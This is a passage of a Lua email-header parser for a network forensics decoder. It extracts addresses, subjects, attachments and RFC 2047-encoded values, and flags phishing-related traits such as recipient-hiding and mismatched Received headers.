"Register Address Hosts" : default FALSE
Whether to register the host portion of email addresses as meta.
The key used to register will be alias.host, alias.ip, or
alias.ipv6 as appropriate.
"Parse Received headers" : default TRUE
Whether to register meta from Received: headers.
Many MTAs put all sorts of badly formatted information into
"Received:" headers. Most likely this will manifest as alias.host
meta that isn't a hostname.
If this is problematic in your environment, disable parsing of
Received: headers.
"X-Mailer Key" : default "client"
Default behavior is to register the value of X-Mailer headers with the 'mailer'
index key.
Modifying this value will cause X-Mailer values to as well be registered with
the specified key. If the key does not already exist it will be created - normal
key name restrictions apply.
"Custom Headers" : default NONE
Beware of excessive duplication, which will impact performance and retention. Meta
registered will be in addition to, not replacement of, standard meta registration.
In other words, if you specify "subject" headers be registered to key "foo", it
will still also be registered to subject.
Syntax is,
{
["header"] = "key",
["header"] = "key",
}
Where,
"header" is the desired HTTP header in lowercase. Do not included spaces, colons, etc.
"key" is the desired meta key with which to register the value of that header
Key names must be 16 characters or less, and consist only of letters and dots. Keys
specified that do not meet these requirements will be modified in order to conform.
Keys listed here are registered as format="Text". Don't use keys indexed as other formats.
Changes to this option require a restart of the decoder service. Simply reloading
parsers is not sufficient for changes to take effect.
IMPLEMENTATION
A block of headers must contain a total of at least 5 mail-like headers.
If that requirement is not fulfilled, then no meta is registered for
that block.
Meta "group" ostensibly is registered by the native parser. However,
I've never seen it registered, and I have no idea what it would be.
Therefore, meta "group" is not registered by this parser.
The native parser sometimes registers content "message/rfc822",
sometimes content "mail", sometimes both. I can't determine why one
or the other. This parser simply registers content meta "mail".
In order to not register meta from headers in messages that are
attached to a message, the parser keeps track of mime boundaries.
When an "outer" boundary is seen, only attachment headers are
extracted until the boundary termination is seen. When an "inner"
boundary is seen, no headers are extracted until the boundary
termination is seen.
Notes on RFC 2047 and RFC 2231 encoding:
MULTIPLE CHARACTER SETS
Multiple charsets within the same string are allowed.
E.g. part ISO-2022-JP and part is windows-1256
Furthermore, multiple encodings are also allowed.
E.g. part is quoted-printable, part is base64
There is no way to register multiple character sets for
the same meta value. The only possible solution would be
to register multiple meta values (one for each charset).
However, this parser currently DOES NOT do that. Only
ONE meta value is registered, even if there may be multiple
character sets and/or encodings.
SUPPORTED CHARACTER SETS
Character sets supported by decoder should be those supported
by iconv:
http://www.delorie.com/gnu/docs/recode/recode_30.html
The ramification though is that different versions of decoder
can and will have different versions of iconv. Registering
meta specifying an unsupported set results in a parser error.
So the parser wraps nw.createMeta() in a pcall when meta
with a character set is to be registered. In case that fails,
the parser tries again without specifying a character set.
TODO
Extract/register meta "group" (see NOTES above).
Register multiple meta values for multiple RFC 2047/RFC 2231 character sets?
--]]
summary.dependencies = {
["parsers"] = {
"FeedParser",
"nwll"
},
["feeds"] = {
"investigation"
}
}
summary.softDependencies = {
["parsers"] = {
"SMTP_lua",
}
}
summary.conflicts = {
["parsers"] = {
"MAIL",
"MAIL-flex",
"email-ip"
}
}
summary.keyUsage = {
["action"] = "mail action performed: 'sendfrom, 'sendto', 'attach'",
["alias.host"] = "hostname values from x-originating-ip headers, received headers, and (optional) email addresses",
["alias.ip"] = "ipv4 values from x-originating-ip headers, received headers, and (optional) email addresses",
["alias.ipv6"] = "ipv6 values from x-originating-ip headers, received headers, and (optional) email addresses",
["attachment"] = "filenames of email attachments",
["client"] = "values from x-mailer: headers",
["content"] = "'mail', value of Content-Type headers within messages",
["email"] = "email address found within messages",
["email.dst"] = "(optional) message recipients",
["email.src"] = "(optional) message originators",
["extension"] = "extension from filenames of email attachments",
["fullname"] = "comment portion of addresses, typically a name",
["fullname.dst"] = "(optional) comment portion of recipient addresses",
["fullname.src"] = "(optional) comment portion of sender addresses",
["subject"] = "values from subject: headers",
["analysis.service"] = "characteristics of email messages",
["ioc"] = "indicators of compromise",
}
summary.investigation = {
["analysis.service"] = {
["email recipients cc/bcc only"] = {
["inv.category"] = {
"operations",
},
["inv.context"] = {
"event analysis",
"protocol analysis",
},
["description"] = "An email does not specify a 'To' recipient",
["reason"] = "Attempt to hide message recipients.",
},
["email missing recipients"] = {
["inv.category"] = {
"operations",
},
["inv.context"] = {
"event analysis",
"protocol analysis",
},
["description"] = "An email contains no 'To', 'cc', or 'bcc' recipients",
["reason"] = "Attempt to hide message recipients.",
},
["email address domain is an IP"] = {
["inv.category"] = {
"operations",
},
["inv.context"] = {
"event analysis",
},
["description"] = "An email address of the form 'user@1.2.3.4'",
["reason"] = "Direct to IP email addresses are unusual and suspicious.",
},
["received header hostname mismatch"] = {
["inv.category"] = {
"operations",
},
["inv.context"] = {
"event analysis",
"protocol analysis",
},
["description"] = "A client email server claims to be a host other than the reverse of its IP address.",
["reason"] = "Attempt to masquerade as a legitimate host.",
},
["received header IP mismatch"] = {
["inv.category"] = {
"operations",
},
["inv.context"] = {
"event analysis",
"protocol analysis",
},
["description"] = "The reverse of a client email server's hostname differs from the IP address from which it connected.",
["reason"] = "Attempt to masquerade as a legitimate host.",
},
["express x-mailer"] = {
["inv.category"] = {
"operations",
},
["inv.context"] = {
"event analysis",
},
["description"] = "Email client contains 'express'",
["reason"] = "Express Mailer is often used for phishing campaigns.",
},
["inbound email"] = {
["inv.category"] = {
"operations",
},
["inv.context"] = {
"event analysis",
"protocol analysis",
},
["description"] = "Email source is external to the environment.",
["reason"] = "Filter for incoming email.",
},
["uncommon mail source"] = {
["inv.category"] = {
"operations",
},
["inv.context"] = {
"event analysis",
"protocol analysis",
},
["description"] = "Incoming email from a source not commonly known for sending email.",
["reason"] = "Filter for incoming email.",
},
["subject phish"] = {
["inv.category"] = {
"operations",
},
["inv.context"] = {
"event analysis",
"protocol analysis",
},
["description"] = "Incoming email from an uncommon source with a subject containing a important seeming keyword.",
["reason"] = "Characteristics common to phishing emails.",
},
["base64 email attachment"] = {
["inv.category"] = {
"operations",
},
["inv.context"] = {
"protocol analysis",
},
["description"] = "email message contains base64 encoded attachment",
["reason"] = "Filter for email. Most email attachments are base64",
},
["smtp forged sender"] = {
["inv.category"] = {
"operations",
},
["inv.context"] = {
"protocol analysis",
},
["description"] = "SMTP protocol sender doesn't match envelope sender",
["reason"] = "Commonly seen from distribution lists, etc. When combined with other characteristics, possibily indicative of phishing.",
},
},
["ioc"] = {
["Elderwood XMailer Artifact"] = {
["inv.category"] = {
"threat",
},
["inv.context"] = {
"attack phase",
"delivery",
},
["description"] = "Email client seen involved with the Elder Wood campaign.",
["reason"] = "Indicates that an email is likely a phishing attempt.",
["mitre"] = {
},
},
},
}
summary.liveTags = {
"featured",
"operations",
"event analysis",
"application analysis",
}
local nwll = require("nwll")
local phishingModule
pcall(
function()
phishingModule = require('phishing')
if not (phishingModule and type(phishingModule) == "table" and phishingModule.examine) then
phishingModule = nil
end
end
)
-- define options
local options = ({
["registerEmailSrcDst"] = ({
["name"] = "Register email.src and email.dst",
["description"] = "Register email meta using index keys email.src and email.dst",
["type"] = "boolean",
["default"] = false,
}),
["parseQuoted"] = ({
["name"] = "Parse Quoted Messages",
["description"] = "Register meta from headers within quoted messages.",
["type"] = "boolean",
["default"] = false,
}),
["registerAddressHosts"] = ({
["name"] = "Register Address Hosts",
["description"] = "Register host portion of email addresses.",
["type"] = "boolean",
["default"] = false,
}),
["parseReceived"] = ({
["name"] = "Parse Received headers",
["description"] = "Register meta from Received: headers",
["type"] = "boolean",
["default"] = true
}),
["xmailer"] = {
["name"] = "X-Mailer Key",
["description"] = "Register the values of X-Mailer headers with this key",
["type"] = "string",
["default"] = "client"
},
["customHeaders"] = {
["name"] = "Custom Headers",
["description"] = "Other headers for which to register meta",
["type"] = "table",
["default"] = nil
}
})
-- set options DON'T MODIFY THIS SECTION
pcall(function()
local optionsModule = parserName .. "_options"
optionsModule = require(optionsModule)
for name,parameters in pairs(options) do
if optionsModule[name] then
parameters.value = optionsModule[name]()
end
end
end)
for name,parameters in pairs(options) do
if parameters.type == "number" then
parameters.value = tonumber(parameters.value)
end
if type(parameters.value) ~= parameters.type then
parameters.value = parameters.default
elseif parameters.type == "number" then
parameters.value =
(parameters.minimum and parameters.value < parameters.minimum and parameters.minimum) or
(parameters.maximum and parameters.value > parameters.maximum and parameters.maximum) or
parameters.value
end
end
-- end options
local indexKeys = {}
table.insert(indexKeys, nwlanguagekey.create("action"))
table.insert(indexKeys, nwlanguagekey.create("content"))
table.insert(indexKeys, nwlanguagekey.create("email"))
table.insert(indexKeys, nwlanguagekey.create("fullname"))
table.insert(indexKeys, nwlanguagekey.create("alias.host"))
table.insert(indexKeys, nwlanguagekey.create("client"))
table.insert(indexKeys, nwlanguagekey.create("alias.ip", nwtypes.IPv4))
table.insert(indexKeys, nwlanguagekey.create("alias.ipv6",nwtypes.IPv6))
table.insert(indexKeys, nwlanguagekey.create("subject"))
table.insert(indexKeys, nwlanguagekey.create("attachment"))
table.insert(indexKeys, nwlanguagekey.create("extension"))
table.insert(indexKeys, nwlanguagekey.create("analysis.service"))
table.insert(indexKeys, nwlanguagekey.create("ioc"))
if options.xmailer.value and options.xmailer.value ~= "client" then
table.insert(indexKeys, nwlanguagekey.create(options.xmailer.value, nwtypes.Text))
end
if options.registerEmailSrcDst.value then
table.insert(indexKeys, nwlanguagekey.create("email.src"))
table.insert(indexKeys, nwlanguagekey.create("email.dst"))
table.insert(indexKeys, nwlanguagekey.create("fullname.src"))
table.insert(indexKeys, nwlanguagekey.create("fullname.dst"))
end
if options.customHeaders.value then
local sanitized = {}
for header, key in pairs(options.customHeaders.value) do
local orig_key = key
if type(header) == "string" and #header ~= 0 and type(key) == "string" and #key ~= 0 then
header = string.lower(header)
header = string.gsub(header, "[:%s]+$", "")
if header and #header ~= 0 then
key = string.gsub(key, "[^%w^%.^_]", "")
key = (#key <= 16 and key) or string.sub(key, 1, 16)
if #key ~= 0 then
table.insert(indexKeys, nwlanguagekey.create(key))
sanitized[header] = key
if key ~= orig_key then
nw.logWarning("MAIL_lua: '" .. orig_key .. "' sanitized to '" .. key .. "'")
end
else
nw.logFailure("MAIL_lua: cannot use key '" .. orig_key .. "'")
end
end
end
end
options.customHeaders.value = sanitized
end
mailParser:setKeys(indexKeys)
local version
pcall(
function()
local major, minor = nw.getVersion()
version = major .. "." .. minor
version = tonumber(version)
end
)
version = version or 0
-- Only use transactions if version >= 11.3
local transactions = (version >= 11.3 and true) or false
local SMTP_lua
local function createMeta(xid, key, value, charset)
if key and value then
local registered
if transactions and xid then
if charset then
-- first try adding WITH the charset
registered = pcall(function() xid:addMeta(key, value, charset) end)
end
if not registered then
-- add WITHOUT the charset
xid:addMeta(key, value)
end
else
if charset then
-- first try creating WITH the charset
registered = pcall(function() nw.createMeta(key, value, charset) end)
end
if not registered then
-- create WITHOUT the charset
nw.createMeta(key, value)
end
end
end
end
local commonOrgSources = {
["exacttarget"] = true,
["constant contact"] = true,
["responsys"] = true,
["sitewire marketspace solutions"] = true,
["isdnet"] = true,
["e-dialog"] = true,
["linkedin corporation"] = true,
["qwest communications"] = true,
["silverpop systems"] = true,
["psinet"] = true,
["postini"] = true,
["cheetahmail"] = true,
["amazon.com"] = true,
["eloqua corporation"] = true,
["spark marketing llc"] = true,
["ibm-mgt"] = true,
["facebook"] = true,
["omeda communications"] = true,
["easystreet online services"] = true
}
local phishySubjects = {
"update",
"important",
"notice",
"attention",
"please",
"vpn",
}
local charsetAliases = { -- supported character sets for RFC2047 encoding
--General character sets
["US-ASCII"] = "US-ASCII",
["ASCII"] = "US-ASCII",
["ISO646-US"] = "US-ASCII",
["ISO_646.IRV:1991"] = "US-ASCII",
["ISO-IR-6"] = "US-ASCII",
["ANSI_X3.4-1968"] = "US-ASCII",
["CP367"] = "US-ASCII",
["IBM367"] = "US-ASCII",
["US"] = "US-ASCII",
["CSASCII"] = "US-ASCII",
["ISO646.1991-IRV"] = "US-ASCII",
--General multi-byte encodings
["UTF-8"] = "UTF-8",
["UTF8"] = "UTF-8",
["UCS-2"] = "UCS-2",
["ISO-10646-UCS-2"] = "UCS-2",
["CSUNICODE"] = "UCS-2",
["UCS-2BE"] = "UCS-2BE",
["UNICODEBIG"] = "UCS-2BE",
["UNICODE-1-1"] = "UCS-2BE",
["CSUNICODE11"] = "UCS-2BE",
["UCS-2LE"] = "UCS-2LE",
["UNICODELITTLE"] = "UCS-2LE",
["UCS-4"] = "UCS-4",
["ISO-10646-UCS-4"] = "UCS-4",
["CSUCS4"] = "UCS-4",
["UCS-4BE"] = "UCS-4BE",
["UCS-4LE"] = "UCS-4LE",
["UTF-16"] = "UTF-16",
["UTF-16BE"] = "UTF-16BE",
["UTF-16LE"] = "UTF-16LE",
["UTF-7"] = "UTF-7",
["UNICODE-1-1-UTF-7"] = "UTF-7",
["CSUNICODE11UTF7"] = "UTF-7",
["UCS-2-INTERNAL"] = "UCS-2-INTERNAL",
["UCS-2-SWAPPED"] = "UCS-2-SWAPPED",
["UCS-4-INTERNAL"] = "UCS-4-INTERNAL",
["UCS-4-SWAPPED"] = "UCS-4-SWAPPED",
["JAVA"] = "JAVA",
--Standard 8-bit encodings
["ISO-8859-1"] = "ISO-8859-1",
["ISO_8859-1"] = "ISO-8859-1",
["ISO_8859-1:1987"] = "ISO-8859-1",
["ISO-IR-100"] = "ISO-8859-1",
["CP819"] = "ISO-8859-1",
["IBM819"] = "ISO-8859-1",
["LATIN1"] = "ISO-8859-1",
["L1"] = "ISO-8859-1",
["CSISOLATIN1"] = "ISO-8859-1",
["ISO8859-1"] = "ISO-8859-1",
["ISO8859_1"] = "ISO-8859-1",
["ISO-8859-2"] = "ISO-8859-2",
["ISO_8859-2"] = "ISO-8859-2",
["ISO_8859-2:1987"] = "ISO-8859-2",
["ISO-IR-101"] = "ISO-8859-2",
["LATIN2"] = "ISO-8859-2",
["L2"] = "ISO-8859-2",
["CSISOLATIN2"] = "ISO-8859-2",
["ISO8859-2"] = "ISO-8859-2",
["ISO8859_2"] = "ISO-8859-2",
["ISO-8859-3"] = "ISO-8859-3",
["ISO_8859-3"] = "ISO-8859-3",
["ISO_8859-3:1988"] = "ISO-8859-3",
["ISO-IR-109"] = "ISO-8859-3",
["LATIN3"] = "ISO-8859-3",
["L3"] = "ISO-8859-3",
["CSISOLATIN3"] = "ISO-8859-3",
["ISO8859-3"] = "ISO-8859-3",
["ISO8859_3"] = "ISO-8859-3",
["ISO-8859-4"] = "ISO-8859-4",
["ISO_8859-4"] = "ISO-8859-4",
["ISO_8859-4:1988"] = "ISO-8859-4",
["ISO-IR-110"] = "ISO-8859-4",
["LATIN4"] = "ISO-8859-4",
["L4"] = "ISO-8859-4",
["CSISOLATIN4"] = "ISO-8859-4",
["ISO8859-4"] = "ISO-8859-4",
["ISO8859_4"] = "ISO-8859-4",
["ISO-8859-5"] = "ISO-8859-5",
["ISO_8859-5"] = "ISO-8859-5",
["ISO_8859-5:1988"] = "ISO-8859-5",
["ISO-IR-144"] = "ISO-8859-5",
["CYRILLIC"] = "ISO-8859-5",
["CSISOLATINCYRILLIC"] = "ISO-8859-5",
["ISO8859-5"] = "ISO-8859-5",
["ISO8859_5"] = "ISO-8859-5",
["ISO-8859-6"] = "ISO-8859-6",
["ISO_8859-6"] = "ISO-8859-6",
["ISO_8859-6:1987"] = "ISO-8859-6",
["ISO-IR-127"] = "ISO-8859-6",
["ECMA-114"] = "ISO-8859-6",
["ASMO-708"] = "ISO-8859-6",
["ARABIC"] = "ISO-8859-6",
["CSISOLATINARABIC"] = "ISO-8859-6",
["ISO8859-6"] = "ISO-8859-6",
["ISO8859_6"] = "ISO-8859-6",
["ISO-8859-7"] = "ISO-8859-7",
["ISO_8859-7"] = "ISO-8859-7",
["ISO_8859-7:1987"] = "ISO-8859-7",
["ISO-IR-126"] = "ISO-8859-7",
["ECMA-118"] = "ISO-8859-7",
["ELOT_928"] = "ISO-8859-7",
["GREEK8"] = "ISO-8859-7",
["GREEK"] = "ISO-8859-7",
["CSISOLATINGREEK"] = "ISO-8859-7",
["ISO8859-7"] = "ISO-8859-7",
["ISO8859_7"] = "ISO-8859-7",
["ISO-8859-8"] = "ISO-8859-8",
["ISO_8859-8"] = "ISO-8859-8",
["ISO-8859-8-I"] = "ISO-8859-8",
["ISO_8859-8:1988"] = "ISO-8859-8",
["ISO-IR-138"] = "ISO-8859-8",
["HEBREW"] = "ISO-8859-8",
["CSISOLATINHEBREW"] = "ISO-8859-8",
["ISO8859-8"] = "ISO-8859-8",
["ISO8859_8"] = "ISO-8859-8",
["ISO-8859-9"] = "ISO-8859-9",
["ISO_8859-9"] = "ISO-8859-9",
["ISO_8859-9:1989"] = "ISO-8859-9",
["ISO-IR-148"] = "ISO-8859-9",
["LATIN5"] = "ISO-8859-9",
["L5"] = "ISO-8859-9",
["CSISOLATIN5"] = "ISO-8859-9",
["ISO8859-9"] = "ISO-8859-9",
["ISO8859_9"] = "ISO-8859-9",
["ISO-8859-10"] = "ISO-8859-10",
["ISO_8859-10"] = "ISO-8859-10",
["ISO_8859-10:1992"] = "ISO-8859-10",
["ISO-IR-157"] = "ISO-8859-10",
["LATIN6"] = "ISO-8859-10",
["L6"] = "ISO-8859-10",
["CSISOLATIN6"] = "ISO-8859-10",
["ISO8859-10"] = "ISO-8859-10",
["ISO-8859-13"] = "ISO-8859-13",
["ISO_8859-13"] = "ISO-8859-13",
["ISO-IR-179"] = "ISO-8859-13",
["LATIN7"] = "ISO-8859-13",
["L7"] = "ISO-8859-13",
["ISO-8859-14"] = "ISO-8859-14",
["ISO_8859-14"] = "ISO-8859-14",
["ISO_8859-14:1998"] = "ISO-8859-14",
["ISO-IR-199"] = "ISO-8859-14",
["LATIN8"] = "ISO-8859-14",
["L8"] = "ISO-8859-14",
["ISO-8859-15"] = "ISO-8859-15",
["ISO_8859-15"] = "ISO-8859-15",
["ISO_8859-15:1998"] = "ISO-8859-15",
["ISO-IR-203"] = "ISO-8859-15",
["ISO-8859-16"] = "ISO-8859-16",
["ISO_8859-16"] = "ISO-8859-16",
["ISO_8859-16:2000"] = "ISO-8859-16",
["ISO-IR-226"] = "ISO-8859-16",
["KOI8-R"] = "KOI8-R",
["CSKOI8R"] = "KOI8-R",
["KOI8-U"] = "KOI8-U",
["KOI8-RU"] = "KOI8-RU",
--Windows 8-bit encodings
["CP1250"] = "CP1250",
["WINDOWS-1250"] = "CP1250",
["MS-EE"] = "CP1250",
["CP1251"] = "CP1251",
["WINDOWS-1251"] = "CP1251",
["MS-CYRL"] = "CP1251",
["CP1252"] = "CP1252",
["WINDOWS-1252"] = "CP1252",
["MS-ANSI"] = "CP1252",
["CP1253"] = "CP1253",
["WINDOWS-1253"] = "CP1253",
["MS-GREEK"] = "CP1253",
["CP1254"] = "CP1254",
["WINDOWS-1254"] = "CP1254",
["MS-TURK"] = "CP1254",
["CP1255"] = "CP1255",
["WINDOWS-1255"] = "CP1255",
["MS-HEBR"] = "CP1255",
["CP1256"] = "CP1256",
["WINDOWS-1256"] = "CP1256",
["MS-ARAB"] = "CP1256",
["CP1257"] = "CP1257",
["WINDOWS-1257"] = "CP1257",
["WINBALTRIM"] = "CP1257",
["CP1258"] = "CP1258",
["WINDOWS-1258"] = "CP1258",
--DOS 8-bit encodings
["CP850"] = "CP850",
["IBM850"] = "CP850",
["850"] = "CP850",
["CSPC850MULTILINGUAL"] = "CP850",
["CP866"] = "CP866",
["IBM866"] = "CP866",
["866"] = "CP866",
["CSIBM866"] = "CP866",
--Macintosh 8-bit encodings
["MACROMAN"] = "MACROMAN",
["MACINTOSH"] = "MACROMAN",
["MAC"] = "MACROMAN",
["CSMACINTOSH"] = "MACROMAN",
["MACCENTRALEUROPE"] = "MACCENTRALEUROPE",
["MACICELAND"] = "MACICELAND",
["MACCROATIAN"] = "MACCROATIAN",
["MACROMANIA"] = "MACROMANIA",
["MACCYRILLIC"] = "MACCYRILLIC",
["MACUKRAINE"] = "MACUKRAINE",
["MACGREEK"] = "MACGREEK",
["MACTURKISH"] = "MACTURKISH",
["MACHEBREW"] = "MACHEBREW",
["MACARABIC"] = "MACARABIC",
["MACTHAI"] = "MACTHAI",
--Other platform specific 8-bit encodings
["HP-ROMAN8"] = "HP-ROMAN8",
["ROMAN8"] = "HP-ROMAN8",
["R8"] = "HP-ROMAN8",
["CSHPROMAN8"] = "HP-ROMAN8",
["NEXTSTEP"] = "NEXTSTEP",
--Regional 8-bit encodings used for a single language
["ARMSCII-8"] = "ARMSCII-8",
["GEORGIAN-ACADEMY"] = "GEORGIAN-ACADEMY",
["GEORGIAN-PS"] = "GEORGIAN-PS",
["MULELAO-1"] = "MULELAO-1",
["CP1133"] = "CP1133",
["IBM-CP1133"] = "CP1133",
["TIS-620"] = "TIS-620",
["TIS620"] = "TIS-620",
["TIS620-0"] = "TIS-620",
["TIS620.2529-1"] = "TIS-620",
["TIS620.2533-0"] = "TIS-620",
["TIS620.2533-1"] = "TIS-620",
["ISO-IR-166"] = "TIS-620",
["CP874"] = "CP874",
["WINDOWS-874"] = "CP874",
["VISCII"] = "VISCII",
["VISCII1.1-1"] = "VISCII",
["CSVISCII"] = "VISCII",
["TCVN"] = "TCVN",
["TCVN-5712"] = "TCVN",
["TCVN5712-1"] = "TCVN",
["TCVN5712-1:1993"] = "TCVN",
--CJK character sets (not documented)
["JIS_C6220-1969-RO"] = "JIS_C6220-1969-RO",
["ISO646-JP"] = "JIS_C6220-1969-RO",
["ISO-IR-14"] = "JIS_C6220-1969-RO",
["JP"] = "JIS_C6220-1969-RO",
["CSISO14JISC6220RO"] = "JIS_C6220-1969-RO",
["JIS_X0201"] = "JIS_X0201",
["JISX0201-1976"] = "JIS_X0201",
["X0201"] = "JIS_X0201",
["CSHALFWIDTHKATAKANA"] = "JIS_X0201",
["JISX0201.1976-0"] = "JIS_X0201",
["JIS0201"] = "JIS_X0201",
["JIS_X0208"] = "JIS_X0208",
["JIS_X0208-1983"] = "JIS_X0208",
["JIS_X0208-1990"] = "JIS_X0208",
["JIS0208"] = "JIS_X0208",
["X0208"] = "JIS_X0208",
["ISO-IR-87"] = "JIS_X0208",
["CSISO87JISX0208"] = "JIS_X0208",
["JISX0208.1983-0"] = "JIS_X0208",
["JISX0208.1990-0"] = "JIS_X0208",
["JIS0208"] = "JIS_X0208",
["JIS_X0212"] = "JIS_X0212",
["JIS_X0212.1990-0"] = "JIS_X0212",
["JIS_X0212-1990"] = "JIS_X0212",
["X0212"] = "JIS_X0212",
["ISO-IR-159"] = "JIS_X0212",
["CSISO159JISX02121990"] = "JIS_X0212",
["JISX0212.1990-0"] = "JIS_X0212",
["JIS0212"] = "JIS_X0212",
["GB_1988-80"] = "GB_1988-80",
["ISO646-CN"] = "GB_1988-80",
["ISO-IR-57"] = "GB_1988-80",
["CN"] = "GB_1988-80",
["CSISO57GB1988"] = "GB_1988-80",
["GB_2312-80"] = "GB_2312-80",
["ISO-IR-58"] = "GB_2312-80",
["CSISO58GB231280"] = "GB_2312-80",
["CHINESE"] = "GB_2312-80",
["GB2312.1980-0"] = "GB_2312-80",
["ISO-IR-165"] = "ISO-IR-165",
["CN-GB-ISOIR165"] = "ISO-IR-165",
["KSC_5601"] = "KSC_5601",
["KS_C_5601-1987"] = "KSC_5601",
["KS_C_5601-1989"] = "KSC_5601",
["ISO-IR-149"] = "KSC_5601",
["CSKSC56011987"] = "KSC_5601",
["KOREAN"] = "KSC_5601",
["KSC5601.1987-0"] = "KSC_5601",
["KSX1001:1992"] = "KSC_5601",
--CJK encodings
["EUC-JP"] = "EUC-JP",
["EUCJP"] = "EUC-JP",
["EXTENDED_UNIX_CODE_PACKED_FORMAT_FOR_JAPANESE"] = "EUC-JP",
["CSEUCPKDFMTJAPANESE"] = "EUC-JP",
["EUC_JP"] = "EUC-JP",
["SJIS"] = "SJIS",
["SHIFT_JIS"] = "SJIS",
["SHIFT-JIS"] = "SJIS",
["MS_KANJI"] = "SJIS",
["CSSHIFTJIS"] = "SJIS",
["CP932"] = "CP932",
["ISO-2022-JP"] = "ISO-2022-JP",
["CSISO2022JP"] = "ISO-2022-JP",
["ISO2022JP"] = "ISO-2022-JP",
["ISO-2022-JP-1"] = "ISO-2022-JP-1",
["ISO-2022-JP-2"] = "ISO-2022-JP-2",
["CSISO2022JP2"] = "ISO-2022-JP-2",
["EUC-CN"] = "EUC-CN",
["EUCCN"] = "EUC-CN",
["GB2312"] = "EUC-CN",
["CN-GB"] = "EUC-CN",
["CSGB2312"] = "EUC-CN",
["EUC_CN"] = "EUC-CN",
["GBK"] = "GBK",
["CP936"] = "GBK",
["GB18030"] = "GB18030",
["ISO-2022-CN"] = "ISO-2022-CN",
["CSISO2022CN"] = "ISO-2022-CN",
["ISO2022CN"] = "ISO-2022-CN",
["ISO-2022-CN-EXT"] = "ISO-2022-CN-EXT",
["HZ"] = "HZ",
["HZ-GB-2312"] = "HZ",
["EUC-TW"] = "EUC-TW",
["EUCTW"] = "EUC-TW",
["CSEUCTW"] = "EUC-TW",
["EUC_TW"] = "EUC-TW",
["BIG5"] = "BIG5",
["BIG-5"] = "BIG5",
["BIG-FIVE"] = "BIG5",
["BIGFIVE"] = "BIG5",
["CN-BIG5"] = "BIG5",
["CSBIG5"] = "BIG5",
["CP950"] = "CP950",
["BIG5HKSCS"] = "BIG5HKSCS",
["EUC-KR"] = "EUC-KR",
["EUCKR"] = "EUC-KR",
["CSEUCKR"] = "EUC-KR",
["EUC_KR"] = "EUC-KR",
["CP949"] = "CP949",
["UHC"] = "CP949",
["JOHAB"] = "JOHAB",
["CP1361"] = "JOHAB",
["ISO-2022-KR"] = "ISO-2022-KR",
["CSISO2022KR"] = "ISO-2022-KR",
["ISO2022KR"] = "ISO-2022-KR",
["CHAR"] = "CHAR",
["WCHAR_T"] = "WCHAR_T",
}
local function rfc2047(encodedString)
if not encodedString then
return
end
local decodedString, charset = {}, nil
-- look for encoding, e.g., =?windows-1256?B?VklQIFRv...?=
for tempCharset, encoding, tempString in string.gmatch(encodedString, "%s-=%?([^?]+)%?([BbQq])%?([^?]+)%?=") do
if tempCharset and encoding and tempString then
tempCharset = string.match(tempCharset, "^([^*]+)%*") or tempCharset
tempCharset = string.upper(tempCharset)
if charsetAliases[tempCharset] then
tempCharset = charsetAliases[tempCharset]
else
-- Unknown charset
break
end
if charset then
-- If charset is specified multiple times, each subsequent charset must be the identical to
-- the first. There is no way to register meta with multiple charsets.
if charset ~= tempCharset then
break
end
else
-- This is the first charset seen
charset = tempCharset
end
tempString = string.gsub(tempString, "_", " ")
if encoding == "B" or encoding == "b" then
tempString = nw.base64Decode(tempString) or tempString
elseif encoding == "Q" or encoding == "q" then
tempString = nwll.decodeQuotedPrintable(tempString) or tempString
end
table.insert(decodedString, tempString)
end
end
decodedString = (#decodedString > 0 and table.concat(decodedString)) or encodedString
return decodedString, charset
end
local function extractAddresses(header, type)
local meta = {}
local envelopeOriginators
for target in string.gmatch(header, "[^\"\']+") do
if string.find(target, "^.*@") then
for atom in string.gmatch(target, "[^,]+") do
for address in string.gmatch(atom, "[^<^>]+") do
-- trim whitespace
local nonWhitespace = string.match(address, "^%s*()")
address = (nonWhitespace > #address and "") or (string.match(address, ".*%S", nonWhitespace))
if address and #address ~= 0 then
local charset
if string.find(address, "^.*%?=") then
address, charset = rfc2047(address)
end
if string.find(address, "^.*@") then
-- email address
if type == "src" then
envelopeOriginators = envelopeOriginators or {}
table.insert(envelopeOriginators, address)
end
local type = (options.registerEmailSrcDst.value and type and "email." .. type) or "email"
table.insert(meta, {["key"] = type, ["value"] = address, ["charset"] = charset})
if not charset then
local domainPart = string.match(address, "^.*@(.*)$")
if domainPart then
local key
domainPart, key = nwll.determineHostType(domainPart)
if domainPart and key then
if key ~= "alias.host" then
table.insert(meta, {["key"] = "analysis.service", ["value"] = "email address domain is an IP"})
end
if options.registerAddressHosts.value then
table.insert(meta, {["key"] = key, ["value"] = domainPart})
end
end
end
end
else
-- comment, probably a name
local key = "fullname"
if options.registerEmailSrcDst.value and type then
if type == "src" then
key = "fullname.src"
elseif type == "dst" then
key = "fullname.dst"
end
end
table.insert(meta, {["key"] = key, ["value"] = address, ["charset"] = charset})
end
end
end
end
elseif #target ~= 0 then
-- comment, probably a name
local charset
if string.find(target, "^.*%?=") then
target, charset = rfc2047(target)
end
if target and #target ~= 0 then
if string.find(target, "^%s") or string.find(target, "^.*[<>]") then
-- trim extraneous characters
target = string.match(target, "^%s-<([^>]+)")
end
if target and #target ~= 0 then
local key = "fullname"
if options.registerEmailSrcDst.value and type then
if type == "src" then
key = "fullname.src"
elseif type == "dst" then
key = "fullname.dst"
end
end
table.insert(meta, {["key"] = key, ["value"] = target, ["charset"] = charset})
end
end
end
end
return meta, envelopeOriginators
end
local mailFunctions = ({
["authentication-results"] = 0, -- for identification purposes only, no extraction
["bcc"] =
function(header)
local meta = extractAddresses(header, "dst")
if meta then
table.insert(meta, 1, {["key"] = "action", ["value"] = "sendto"})
end
return meta
end,
["cc"] =
function(header)
local meta = extractAddresses(header, "dst")
if meta then
table.insert(meta, 1, {["key"] = "action", ["value"] = "sendto"})
end
return meta
end,
["comments"] = 0, -- for identification purposes only, no extraction
["content-disposition"] =
function(header)
local meta = {}
local parameters = {}
for x in string.gmatch(header, "%s-([^;]+)") do
table.insert(parameters, x)
end
for i,j in ipairs(parameters) do
local attachment = string.match(j, "^.*name=[\"\']?([^\"\']+)")
if attachment then
table.insert(meta, {["key"] = "action", ["value"] = "attach"})
local charset
attachment, charset = rfc2047(attachment)
if attachment then
local dir, file, ext = nwll.extractPathElements(attachment)
if file then
table.insert(meta, {["key"] = "attachment", ["value"] = file, ["charset"] = charset})
end
if ext then
table.insert(meta, {["key"] = "extension", ["value"] = ext, ["charset"] = charset})
end
end
end
end
return meta
end,
["content-transfer-encoding"] =
function(header)
header = (string.find(header, "^%s") and string.match(header, "^%s+(.*)")) or header
if header == "base64" then
